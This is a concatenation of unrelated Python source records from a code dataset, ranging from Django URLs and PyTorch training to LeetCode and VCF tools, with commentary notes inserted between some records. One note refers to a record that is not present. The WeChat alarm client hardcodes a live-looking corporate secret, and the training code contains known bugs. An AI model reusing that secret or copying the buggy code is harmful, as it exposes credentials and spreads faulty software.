https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
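The printMiddle method in the Exercise_3.py record above initialises twostep_ptr but then advances an undefined first_ptr, so it raises NameError as written, and it returns nothing for an empty list. A corrected fast/slow-pointer sketch of the same exercise:

class Node:
    def __init__(self, data):
        self.data = data
        self.next = None

class LinkedList:
    def __init__(self):
        self.head = None

    def push(self, new_data):
        node = Node(new_data)
        node.next = self.head
        self.head = node

    def middle(self):
        """Fast pointer moves two steps per slow step; slow ends at the middle."""
        slow = fast = self.head
        while fast and fast.next:
            fast = fast.next.next
            slow = slow.next
        return slow.data if slow else None

lst = LinkedList()
for v in (1, 2, 3, 4, 5):
    lst.push(v)
print(lst.middle())  # 3 (middle of 5 -> 4 -> 3 -> 2 -> 1)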
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import include ,path\nfrom django.views.generic import TemplateView\nfrom ouragan.views import ContactView\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', TemplateView.as_view(template_name='pages/index.html'), name='home'),\n path('contact/', ContactView.as_view(template_name='pages/contact.html'), name='contact'),\n path('opportunites/', TemplateView.as_view(template_name='pages/opportunites.html'), name='opportunites'),\n path('opportunites/m', TemplateView.as_view(template_name='pages/m.html'), name='m'),\n path('opportunites/e', TemplateView.as_view(template_name='pages/e.html'), name='e'),\n path('opportunites/a', TemplateView.as_view(template_name='pages/a.html'), name='a'),\n path('team/', TemplateView.as_view(template_name='pages/team.html'), name='team'),\n path('eagle_pub/', TemplateView.as_view(template_name='pages/eagle_pub.html'), name='eagle_pub'),\n path('f/', include('formation.urls')),\n]\n","sub_path":"ouragan_opp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"315759823","text":"import torch\nfrom copy import deepcopy\nimport numpy as np\nfrom torch.optim import Adam\nfrom torch.nn import CrossEntropyLoss\nfrom torch.autograd import Variable\nfrom torchvision.datasets import MNIST, FashionMNIST\nfrom utils.misc import tn\nfrom utils.wrapping import wrap\n\nEPOCHS = 15\n\ndef forward(model, dl, lamb=0, optimizer=None):\n criterion = CrossEntropyLoss()\n acc_sum = 0\n tot = 0\n for i, (images, labels) in enumerate(dl):\n print(i)\n images = wrap(Variable(images, requires_grad=False))\n labels = wrap(Variable(labels, requires_grad=False))\n output = model(images)\n if optimizer is not None:\n original_loss = criterion(output, labels)\n penalized_loss = original_loss + float(lamb) * model.loss()\n optimizer.zero_grad()\n penalized_loss.backward()\n optimizer.step()\n\n acc = (output.max(1)[1] == labels).float().sum()\n tot += len(labels)\n acc_sum += acc\n\n acc = tn(acc_sum.data / tot)\n return acc\n\ndef train_until_convergence(model, train_dl, val_dl, lamb, patience=3, min_epochs=2):\n best_model = None\n best_score = (-np.inf, 0)\n early_stop = 0\n\n print('lambda', lamb)\n\n optimizer = Adam(model.parameters())\n\n while True:\n train_acc = forward(model, train_dl, lamb, optimizer)\n current_accuracy = forward(model, val_dl)\n capacities = model.training_component().get_capacities().data.cpu().numpy()\n current_score = (-capacities.sum(), current_accuracy)\n\n print(train_acc, current_accuracy, capacities)\n\n if model.has_collapsed():\n raise StopIteration('Model collapsed')\n elif min_epochs > 0:\n min_epochs -=1\n elif current_score > best_score:\n best_model = deepcopy(model)\n best_score = current_score\n early_stop = 0\n elif early_stop == patience - 1:\n return best_score[1], best_model\n else:\n early_stop += 1\n\ndef train(gen_block, base_model, train_dl, val_dl, test_dl, start_lamb=10, lamb_decay=10, max_patience=4, default_block_size=25, min_lambda=1e-7, max_block_size=100):\n block_size = default_block_size\n lamb = start_lamb\n val_accuracies = []\n test_accuracies = []\n Global_best_acc = 0\n while block_size <= max_block_size: # Add blocks\n current_model = base_model.next_block(gen_block(block_size))\n best_model = None\n while True: # Find Grip\n try:\n current_accuracy, current_model = 
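In the block_sparse_training.py record that begins above, note that `Global_best_acc = 0` is assigned with a capital G while every later read uses `global_best_acc`, so the first comparison raises NameError, and the `while False:` "Optimize" loop is dead code. The surviving control flow, retrying with a weaker sparsity penalty whenever the model collapses, can be isolated as a sketch with a stub trainer:

def lambda_decay_search(train_once, start_lamb=10.0, lamb_decay=10.0, min_lambda=1e-7):
    """Retry training with progressively weaker penalties until one succeeds.

    `train_once(lamb)` returns an accuracy, or raises StopIteration when the
    penalised model collapses, mirroring train_until_convergence above.
    """
    lamb = start_lamb
    while lamb >= min_lambda:
        try:
            return lamb, train_once(lamb)
        except StopIteration:
            lamb /= lamb_decay          # penalty too strong; relax and retry
    return None

def stub_trainer(lamb):
    if lamb >= 1:
        raise StopIteration("model collapsed")
    return 0.9

print(lambda_decay_search(stub_trainer))  # (0.1, 0.9)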
train_until_convergence(current_model, train_dl, val_dl, lamb, patience=max_patience)\n break\n except StopIteration:\n lamb /= lamb_decay\n if lamb < min_lambda:\n return val_accuracies, test_accuracies, base_model\n current_model = base_model.next_block(gen_block(block_size))\n best_acc = current_accuracy\n best_model = deepcopy(current_model)\n while False: # Optimize\n best_acc = current_accuracy\n if best_acc < global_best_acc:\n break\n best_model = deepcopy(current_model)\n lamb *= lamb_decay\n try:\n current_accuracy, current_model = train_until_convergence(current_model, train_dl, val_dl, lamb, patience=max_patience)\n except StopIteration:\n current_accuracy = 0\n if current_accuracy < best_acc:\n break\n else:\n best_acc = current_accuracy\n if best_acc > global_best_acc: # We did improve the model\n print('did improve')\n base_model = best_model # We build on top of this block\n block_size = max(block_size, int(min(max_block_size, 3 * tn(base_model.training_component().get_capacities().max().data))))\n global_best_acc = best_acc\n val_accuracies.append(best_acc)\n test_acc = forward(base_model, test_dl)\n print('TEST ACC:', test_acc)\n test_accuracies.append(test_acc)\n else:\n print('did not improve')\n lamb /= lamb_decay\n if lamb <= min_lambda: # We can only increase the size\n break\n return val_accuracies, test_accuracies, base_model\n","sub_path":"algorithms/block_sparse_training.py","file_name":"block_sparse_training.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"417737847","text":"_author = \"Vinodh Krishna Erramachetty Munaswamy\"\n\nfor i in range(1,11):\n print(\"Value of i is {0:2}\".format(i))\n\nnumber = \"8,999,888,777,666\"\nfor i in range(0,len(number)):\n print(number[i])\n\nfor i in range(0,len(number)):\n if number[i] in \"0123456789\":\n print(number[i])\n\nfor i in range(0,len(number)):\n if number[i] in \"0123456789\":\n print(number[i],end=\"\")\nprint(\"\")\ncleanednumber=\"\"\nfor i in range(0,len(number)):\n if number[i] in \"0123456789\":\n cleanednumber = cleanednumber + number[i]\nnewnumber = int(cleanednumber)\nprint(\"Actual integer is {}\".format(newnumber))\n\nnumber1 = \"9,111,222,333,444,555,666\"\nfor char1 in number1:\n if char1 in \"0123456789\":\n print(char1,end=\"\")\nprint(\"\")\n\nnumber2 = \"1,22,33,44,55,66,77\"\nconstring = \"\"\nfor char2 in number2:\n if char2 in \"0123456789\":\n constring = constring + char2\nconintstring = int(constring)\nprint(conintstring)\n\nfor i in range(1,10):\n for j in range(1,5):\n print(\"Inner Loop\")\n print(\"Outer loop*******\")\n\nfor i in range(0,101):\n if (i%7 == 0):\n print(i)\n# print(i//7)","sub_path":"BasicPrograms/ForLoopBasic.py","file_name":"ForLoopBasic.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"156819715","text":"# 부모없는=루트노드 찾기\n# 루트->후보로 이동 후\n# 후보에서 다시 dfs->visited에 없는거따라 내려감\n# count 후 리턴\n\nimport sys\nsys.stdin = open('5174.subtree.txt')\n\ndef dfs(start, graph):\n visit=[]\n stack=[]\n\n stack.append(start)\n\n while stack:\n node=stack.pop()\n if node==0:\n break\n if node not in visit:\n visit.append(node)\n stack.extend(graph[node])\n\n return visit\n\n\nT=int(input())\n\nfor test_case in range(1, T+1):\n E, N=map(int, input().split())\n data=list(map(int, input().split()))\n mat=[[] for _ in range(E+2)]\n for i in range(len(data)):\n if i%2==0:\n 
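The ForLoopBasic.py record above strips the thousands separators out of "8,999,888,777,666" one character at a time; the same cleanup is a single expression with str.replace, and the filter form stays close to the original loop:

number = "8,999,888,777,666"
print(int(number.replace(",", "")))   # 8999888777666

# Equivalent filter form, closer to the character loop in the record:
digits_only = "".join(ch for ch in number if ch.isdigit())
print(int(digits_only))               # 8999888777666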
mat[data[i]].append(data[i+1])\n print(mat)\n\n ans=len(dfs(N, mat))\n print(f'#{test_case} {ans}')","sub_path":"SWEA/수업/5174.subtree.py","file_name":"5174.subtree.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"139829882","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\n\nfrom .models import Employee, Punch\n\ndef valid_user(fn):\n def _valid(request, **kwargs):\n if request.session.get('user_name', default=None) == None:\n return HttpResponseRedirect(reverse('attendence:login', args=None))\n else:\n punch(request) \n return fn(request, **kwargs)\n return _valid \n\ndef punch(request):\n user_name = request.session.get('user_name')\n ip = request.get_host()\n emp = Employee.objects.filter(user_name=user_name)[0]\n Punch.objects.create(employee=emp, IP=ip, entry_user=emp)","sub_path":"basic/attendence/decrator.py","file_name":"decrator.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"494923715","text":"#!/usr/bin/env python3.6\nimport subprocess,os\nfrom pyfiglet import Figlet\nfrom termcolor import colored\nfrom tabletext import to_text\n\n\ndef check_status():\n \n telg = str(subprocess.check_output('systemctl status influxdb | grep Active',shell=True)).split()\n influxdb =str(subprocess.check_output('systemctl status telegraf | grep Active',shell=True)).split()\n \n table = [[\"InfluxDB\",\"Service:\"+influxdb[2]],\n [\"Telegraf\",\"Service:\"+telg[2]]]\n \n return to_text(table,padding=(2,10))\n\n\n\nif __name__==\"__main__\":\n \n subprocess.call('clear')\n \n \n print(colored(Figlet(font='roman').renderText('Influx_Angie'),\"yellow\"))\n print(check_status())\n print(input())\n \n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"244509452","text":"import sys\nimport numpy as np\nimport sklearn\nimport sklearn.manifold\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport random\nimport time\nfrom operator import itemgetter \n\nif len(sys.argv) == 1:\n npzfile = np.load('result_reduction.npz')\n indices = npzfile['indices']\n X_2d = npzfile['X_2d']\n X_2d = np.split(X_2d, indices)\n samples = random.sample(range(len(X_2d)), 10)\n selected = np.concatenate(itemgetter(*samples)(X_2d))\n\n fig, ax = plt.subplots()\n lines = [ax.plot([], [], '+-', label=str(ind+1))[0] for ind in samples]\n texts = [ax.text(0,0,'') for ind in samples]\n plt.legend()\n ax.set_xlim([selected[:,0].min(), selected[:,0].max()])\n ax.set_ylim([selected[:,1].min(), selected[:,1].max()])\n\n #def init():\n # for line in lines:\n # line.set_data([],[])\n # return lines\n\n def animate(count):\n modified = []\n for line, text, ind in zip(lines, texts, samples):\n if count <= len(X_2d[ind]):\n line.set_data(X_2d[ind][:count, 0], X_2d[ind][:count, 1])\n text.set_position(X_2d[ind][count-1])\n text.set_text(str(count-1))\n modified.append(line)\n modified.append(text)\n return modified\n\n ani = animation.FuncAnimation(fig, animate, \\\n blit=False, interval=200, save_count=120)\n ani.save('movie.mp4')\n plt.show()\n\nelse:\n features = []\n indices = []\n index_cur = 0\n for filepath in sys.argv[1:]:\n feature = np.load(filepath)\n start = feature.shape[0]//4\n stop = 
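The subtree record above (its Korean header: find the parentless root node, walk from the root to the candidate, DFS again from the candidate along unvisited nodes, count and return) keeps `visit` as a list, making each membership check O(n), and `if node==0: break` aborts the whole traversal on the first 0 sentinel where skipping just that entry is likely intended. A set-based sketch of the same count:

def subtree_size(root, children):
    """Count nodes reachable from `root` in an adjacency list `children`."""
    seen = set()
    stack = [root]
    while stack:
        node = stack.pop()
        if node == 0 or node in seen:   # 0 is the "no child" sentinel
            continue
        seen.add(node)
        stack.extend(children[node])
    return len(seen)

children = [[], [2, 3], [4], [], [0]]   # node 4's only entry is the sentinel
print(subtree_size(1, children))        # 4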
feature.shape[0]//4*3\n feature = feature[start:stop,:]\n index_cur += feature.shape[0]\n features.append(feature)\n indices.append(index_cur)\n indices.pop()\n X = np.concatenate(features)\n print('collected '+str(len(features))+' files, ' \\\n + str(X.shape[0])+' features')\n reduction = sklearn.manifold.Isomap(n_components=2)\n #reduction = sklearn.manifold.TSNE(n_components=2)\n X_2d = reduction.fit_transform(X)\n np.savez('result_reduction.npz', indices=indices, X=X, X_2d=X_2d)\n print('dim reduction fitted and saved')\n","sub_path":"dim_reduction.py","file_name":"dim_reduction.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"274909463","text":"import os\nimport re\nimport json\nimport speech_recognition as sr\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('input_dir', type=str, help='directory with all the chunk mp3 files')\nparser.add_argument('language', type=str, help='language code for speech recognition. example hi-In,bn-In')\nargs = parser.parse_args()\n\ninput_file_format = \".wav\"\noutput_json_file = os.path.join(args.input_dir,\"text_detected.json\")\n\ndef atoi(text):\n return int(text) if text.isdigit() else text\ndef natural_keys(text):\n return [ atoi(c) for c in re.split(r'(\\d+)', text) ] \n\nall_audio_chunks = []\nfor file in os.listdir(args.input_dir):\n if file.endswith(input_file_format):\n all_audio_chunks.append(file)\n\nall_audio_chunks.sort(key=natural_keys)\n\noutput_text_dict = {\"fragments\":[]}\n\nspeech_recognizer = sr.Recognizer()\n\nfor i,file in enumerate(all_audio_chunks):\n with sr.AudioFile(os.path.join(args.input_dir,file)) as source:\n text = speech_recognizer.listen(source)\n time_start = os.path.splitext(file)[0].split(\"_\")[1].split(\"-\")[0]\n time_end = os.path.splitext(file)[0].split(\"_\")[1].split(\"-\")[1]\n try:\n text_output = speech_recognizer.recognize_google(text,language=args.language) \n print(\"Speech to text ...{}\".format(file)) \n except:\n text_output = \" \"\n \n output_text_dict[\"fragments\"].append({\"begin\":time_start,\\\n \"end\": time_end,\\\n \"id\": i,\\\n \"language\": args.language[:2],\n \"lines\": [text_output]})\n # output_text_list.append({'time_start':time_start,'time_end':time_end,'text':text_output})\n\nwith open(output_json_file, 'w', encoding='utf8') as f:\n json.dump(output_text_dict, f, ensure_ascii=False)\n\n\n","sub_path":"speech_to_text.py","file_name":"speech_to_text.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"50979045","text":"import json\nimport logging\nimport time\n\nimport requests\n\n# Get an instance of a logger\nlogger = logging.getLogger(__name__)\n\n\nclass WexinAlarm:\n def __init__(self):\n self.token = \"\"\n self.expired = int(time.time())\n\n def refresh_token(self):\n now = int(time.time())\n if now < self.expired and len(self.token) > 0:\n return\n\n url = \"https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=ww2ef294fd1f043429&corpsecret=deLb5gd4hiP-l5ekwbEZ6h1WZbGz43VPOWgqwRrfqIM\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n\n if response.status_code > 300:\n logger.error(\"error status code for weixin token: %d\", response.status_code)\n return\n\n resp_obj = json.loads(response.text)\n if resp_obj['errcode'] != 0:\n logger.error(\"failed to get token: %s\", resp_obj['errmsg'])\n return\n\n self.token = 
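The fitting branch of dim_reduction.py above keeps the middle half of each feature file (rows shape[0]//4 to shape[0]//4*3), concatenates everything, fits a 2-D Isomap, and records the split points so the plotting branch can recover one trajectory per file with np.split. The same pipeline on random stand-in arrays:

import numpy as np
from sklearn.manifold import Isomap

rng = np.random.default_rng(0)
features = [rng.normal(size=(40, 8)) for _ in range(3)]   # stand-ins for np.load(...)

trimmed = [f[f.shape[0] // 4 : f.shape[0] // 4 * 3] for f in features]
indices = np.cumsum([t.shape[0] for t in trimmed])[:-1]   # split points, last dropped

X = np.concatenate(trimmed)
X_2d = Isomap(n_components=2).fit_transform(X)
per_file = np.split(X_2d, indices)                        # one 2-D track per file
print([p.shape for p in per_file])                        # [(20, 2), (20, 2), (20, 2)]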
resp_obj['access_token']\n self.expired = int(time.time()) + resp_obj['expires_in']\n\n def send_msg(self, users, msg):\n self.refresh_token()\n url = \"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=\" + self.token\n\n payload = {\n \"touser\": users,\n \"toparty\": \"1\",\n \"msgtype\": \"text\",\n \"agentid\": 1000002,\n \"text\": {\n \"content\": msg\n },\n \"safe\": 0,\n \"enable_id_trans\": 0,\n \"enable_duplicate_check\": 0,\n \"duplicate_check_interval\": 1800\n }\n headers = {\n 'Content-Type': 'application/json'\n }\n\n resp = requests.request(\"POST\", url, headers=headers, data=json.dumps(payload))\n if resp.status_code >= 300:\n logger.error('failed to send message to wechat: %s', resp.text)\n","sub_path":"schema/alarms.py","file_name":"alarms.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"459939360","text":"#!/usr/bin/env python2.7\n\nimport os, sys\nimport string\nimport ngb_functions\nfrom pysam import VariantFile\nfrom pysam import FastaFile\nfrom optparse import OptionParser\nfrom collections import defaultdict\nfrom collections import namedtuple\nfrom collections import OrderedDict\n\ndef run_process(opts, inputvcf):\n outputvcf = opts.output\n\n # Open VCF\n vcf_in = VariantFile(inputvcf)\n\n # Add INFO to Header\n vcf_in.header.info.add(\"TYPE\",\"A\",\"String\",\"The type of allele, either snp, ins, del, or complex.\")\n\n # Add FORMAT to Header\n vcf_in.header.formats.add(\"NGB_DP\",\"1\",\"Integer\",\"Approximate read depth; some reads may have been filtered\")\n vcf_in.header.formats.add(\"NGB_AO\",\"A\",\"Integer\",\"Alternate allele observation count\")\n vcf_in.header.formats.add(\"NGB_RO\",\"1\",\"Integer\",\"Reference allele observation count\")\n vcf_in.header.formats.add(\"NGB_VAF\",\"A\",\"Float\",\"Allele fractions of alternate alleles in the tumor\")\n\n # Write VCF\n vcf_out = VariantFile(outputvcf if outputvcf else '-','w',header=vcf_in.header)\n\n for record in vcf_in.fetch():\n chrom = record.chrom\n pos = record.pos\n ref = record.ref\n alts = record.alts\n\n variant_type_list = list()\n ngb_dp_list = list()\n ngb_ao_list = list()\n ngb_ro_list = list()\n ngb_vaf_list = list()\n tmp_dp = sum(record.samples[0]['AD'])\n tmp_ro = record.samples[0]['AD'][0]\n for n,alt in enumerate(alts):\n # Get Variant TYPE (freebayes format)\n ret = ngb_functions.pairdiff(ref,alt)\n vartype = ret['variant_type']\n variant_type_list.append(vartype)\n\n # Get DP,AO,RO,VAF\n tmp_vaf = float(record.samples[0]['AD'][(n+1)]) / float(tmp_dp)\n tmp_ao = int(record.samples[0]['AD'][(n+1)])\n ngb_dp_list.append(tmp_dp)\n ngb_ao_list.append(tmp_ao)\n ngb_vaf_list.append(tmp_vaf)\n\n if variant_type_list != []:\n #info_value = ','.join(str(e) for e in variant_type_list)\n record.info['TYPE'] = variant_type_list\n if ngb_dp_list != []:\n record.samples[0][\"NGB_DP\"] = ngb_dp_list[0]\n record.samples[0][\"NGB_AO\"] = tuple(ngb_ao_list)\n record.samples[0][\"NGB_RO\"] = tmp_ro\n record.samples[0][\"NGB_VAF\"] = tuple(ngb_vaf_list)\n\n # Write VCF\n vcf_out.write(record)\n # Run End\n\nif __name__ == '__main__':\n usage = \"\"\"usage: %prog [options] \"\"\"\n parser = OptionParser(usage=usage)\n parser.add_option(\"-o\", \"--output\", dest=\"output\", help=\"Output VCF File (default : stdout)\", default=\"\")\n\n (options, args) = parser.parse_args()\n if len(args) < 1:\n parser.print_help()\n sys.exit(1)\n\n original_vcf = args[0]\n run_process(options, 
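The refresh_token method above re-requests a WeChat Work access token only when the cached one is missing or past its expiry. The pattern generalises to any bearer-token API; in this sketch the errcode/errmsg/access_token/expires_in fields follow the record, but treat the endpoint shape as an assumption:

import time
import requests

class CachedToken:
    """Fetch a bearer token lazily and reuse it until it expires."""

    def __init__(self, token_url):
        self.token_url = token_url
        self._token = ""
        self._expires_at = 0.0

    def get(self):
        if time.time() < self._expires_at and self._token:
            return self._token
        payload = requests.get(self.token_url, timeout=10).json()
        if payload.get("errcode", 0) != 0:
            raise RuntimeError(payload.get("errmsg", "token request failed"))
        self._token = payload["access_token"]
        # renew a minute early so in-flight requests don't race the expiry
        self._expires_at = time.time() + payload["expires_in"] - 60
        return self._token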
original_vcf)\n","sub_path":"pipelines/utils/ngb_addTypeInfoNGBFormat.py","file_name":"ngb_addTypeInfoNGBFormat.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"47410228","text":"# The read4 API is already defined for you.\n# @param buf, a list of characters\n# @return an integer\n# def read4(buf):\n\nclass Solution(object):\n def __init__(self):\n self.prev = []\n\n def read(self, buf, n):\n \"\"\"\n :type buf: Destination buffer (List[str])\n :type n: Maximum number of characters to read (int)\n :rtype: The number of characters read (int)\n \"\"\"\n eof, total, tmp = False, 0, [''] * 4\n if self.prev:\n count = min(len(self.prev), n)\n buf[:count] = self.prev[:count]\n total += count\n self.prev = self.prev[count:] if count < len(self.prev) else []\n \n while not eof and total < n:\n count = read4(tmp)\n eof = count < 4\n if count > n-total:\n self.prev = tmp[n-total:count]\n count = n-total\n buf[total:total+count] = tmp\n total += count\n\n return total\n","sub_path":"python_solutions/158-read-n-characters-given-read4-ii-call-multiple-times.py","file_name":"158-read-n-characters-given-read4-ii-call-multiple-times.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"248769983","text":"\"\"\"\nAuthor: Andrew Harris\nPython 3.8.3\n\"\"\"\nimport argparse\nfrom pathlib import Path\n\nimport pandas as pd\nimport plotly\nimport plotly.graph_objs as go\nimport plotly.express as px\nfrom plotly.subplots import make_subplots\n\n\ndef _read_file_to_df(f):\n \"\"\"Read in file based of suffix\"\"\"\n if f.suffix == \".tsv\":\n df = pd.read_csv(f, sep='\\t')\n return df\n elif f.suffix == '.csv':\n df = pd.read_csv(f, sep=',')\n return df\n\n\ndef make_plot(df, outdir, fname):\n # ---- df melt + organize ----\n df = df.melt(id_vars=[\"Chromosome\", \"Start\", \"Stop\"])\n df.columns = [\"Chromosome\", \"Start\", \"Stop\", \"Sample\", \"p_distance\"]\n df.sort_values(by=[\"Chromosome\", \"Start\", \"Stop\"], inplace=True)\n\n # ---- collect df info ----\n chromosomes = [i for i in df['Chromosome'].unique()]\n samples = [i for i in df['Sample'].unique()]\n samples.sort(reverse=True)\n\n # ---- Get max p_distance value to set y-axis range ----\n y_max = float(df[\"p_distance\"].max() * 1.1) # increase 10% above max\n x_max = df[\"Stop\"].max() * 1.01 # increase 10% above max\n\n colors = px.colors.qualitative.Prism\n\n base_graph_height = 150\n\n fig = make_subplots(\n rows=len(chromosomes),\n cols=1,\n x_title=\"Position\",\n y_title=\"p-distance\",\n row_titles=chromosomes,\n vertical_spacing=0.01,\n row_heights=[base_graph_height] * len(chromosomes),\n )\n\n for placeholder, sample in enumerate(samples):\n legend_flag = True\n for row, current_chrom in enumerate(chromosomes, start=1):\n filt = (df['Chromosome'] == current_chrom) & (df[\"Sample\"] == sample)\n sample_chromosome_data = df[filt]\n # Make figure\n fig.add_trace(\n go.Scatter(\n x=sample_chromosome_data['Stop'],\n y=sample_chromosome_data['p_distance'],\n mode='lines',\n legendgroup=str(sample),\n name=sample,\n line=dict(\n color=colors[placeholder],\n width=float(0.75)\n ),\n showlegend=legend_flag,\n ),\n row=row,\n col=1\n )\n legend_flag = False\n continue\n continue\n # ---- Update figure ----\n fig.update_layout(\n height=base_graph_height*len(chromosomes),\n template=\"simple_white\",\n margin=dict(\n l=60,\n r=10,\n b=60,\n t=0,\n 
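The read4 record above stores characters left over when a 4-character chunk overshoots n, so a later call serves them before touching read4 again. A self-contained simulation of those semantics (the judge normally supplies read4; the factory below is a test stand-in only):

def make_read4(source):
    """Return a read4(buf) that drains `source` four characters at a time."""
    it = iter(source)
    def read4(buf):
        count = 0
        for ch in it:
            buf[count] = ch
            count += 1
            if count == 4:
                break
        return count
    return read4

class Reader:
    def __init__(self, read4):
        self.read4 = read4
        self.leftover = []              # chars fetched but not yet handed out

    def read(self, buf, n):
        total = 0
        while total < n:
            if not self.leftover:
                tmp = [''] * 4
                got = self.read4(tmp)
                if got == 0:
                    break               # end of file
                self.leftover = tmp[:got]
            take = min(len(self.leftover), n - total)
            buf[total:total + take] = self.leftover[:take]
            self.leftover = self.leftover[take:]
            total += take
        return total

r = Reader(make_read4("abcdefgh"))
buf = [''] * 8
print(r.read(buf, 3), buf[:3])   # 3 ['a', 'b', 'c']
print(r.read(buf, 5), buf[:5])   # 5 ['d', 'e', 'f', 'g', 'h']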
pad=5\n ),\n legend=dict(\n orientation=\"h\",\n yanchor=\"bottom\",\n y=1,\n xanchor=\"left\",\n x=0,\n itemsizing='trace',\n title=\"\",\n ),\n font=dict(\n family=\"Arial, monospace\",\n size=12,\n ),\n annotations=[{\n \"font\": dict(\n family=\"Arial, monospace\",\n size=12,\n ),\n }]\n )\n fig.for_each_annotation(lambda a: a.update(text=a.text.split(\"=\")[-1]))\n fig.update_yaxes(range=[0.0, y_max], fixedrange=True)\n fig.update_xaxes(range=[0, x_max])\n html_filename = outdir / f\"{fname}.html\"\n fig.write_html(str(html_filename))\n return\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='Creates full genome p-distance plot',\n )\n parser.add_argument(\n '-i', \n '--input', \n type=str, \n action='store', \n required=True, \n help='Input p-distance file'\n )\n parser.add_argument(\n '-o', \n '--output', \n type=str, \n action='store', \n required=True, \n help='Output location (i.e directory)',\n )\n args = parser.parse_args()\n \n # --- input variables ---\n INPUT_FILE = Path(args.input)\n OUTPUT_DIR = Path(args.output)\n\n # --- read file + plot ----\n pdist_df = _read_file_to_df(INPUT_FILE)\n make_plot(pdist_df, OUTPUT_DIR, INPUT_FILE.stem)\n return\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"graphing_scripts/full_genome_p_distance_plot.py","file_name":"full_genome_p_distance_plot.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"89309813","text":"import time\r\n\r\ntStart = time.clock()\r\n\r\npalindromes = []\r\n\r\nfor j in range(100,1000):\r\n\r\n for i in range(100,1000):\r\n \r\n palinCheck = j * i\r\n \r\n if palinCheck - 100000 > 0:\r\n \r\n copyTest = palinCheck\r\n \r\n digit1 = palinCheck//100000\r\n copyTest -= digit1*100000\r\n digit2 = copyTest//10000\r\n copyTest -= digit2*10000\r\n digit3 = copyTest//1000\r\n copyTest -= digit3*1000\r\n digit4 = copyTest//100\r\n copyTest -= digit4*100\r\n digit5 = copyTest//10\r\n copyTest -= digit5*10\r\n digit6 = copyTest//1\r\n \r\n if digit1 == digit6 and digit2 == digit5 and digit3 == digit4:\r\n palindromes.append(palinCheck)\r\n \r\npalindromes.sort(key=None, reverse=True) \r\nprint(palindromes[0])\r\ntEnd = time.clock()\r\nprint(tEnd - tStart)\r\n\r\n","sub_path":"K/Q4K.py","file_name":"Q4K.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"395111835","text":"import sys\nimport math\nfor line in sys.stdin:\n line=line.replace('\\n',\"\")\n if line!=\"0:00\":\n line=line.split(':')\n minute=float(line[1])*6\n sati=(float(line[0])%12)*30+(minute/12)\n if sati>minute:\n if(sati-minute<=180):\n print(\"%.3f\" %(sati-minute))\n else:\n print(\"%.3f\" %(360-sati+minute))\n else:\n if(minute-sati<=180):\n print(\"%.3f\" %(minute-sati))\n else:\n print(\"%.3f\" %(360-minute+sati))\n else:\n break\n ","sub_path":"uva579.py","file_name":"uva579.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"213703443","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 20 13:41:52 2017\n\n@author: Skyler Norgaard and Jacob Scott... 
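The Q4K.py record above unpacks the six digits of each product by hand to test for a palindrome, and it calls time.clock(), which was removed in Python 3.8 (time.perf_counter() is the replacement). Comparing against the reversed string is shorter and works for any digit count:

import time

start = time.perf_counter()
largest = max(
    i * j
    for i in range(100, 1000)
    for j in range(i, 1000)           # j >= i avoids checking each pair twice
    if str(i * j) == str(i * j)[::-1]
)
print(largest)                         # 906609
print(f"{time.perf_counter() - start:.3f}s")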
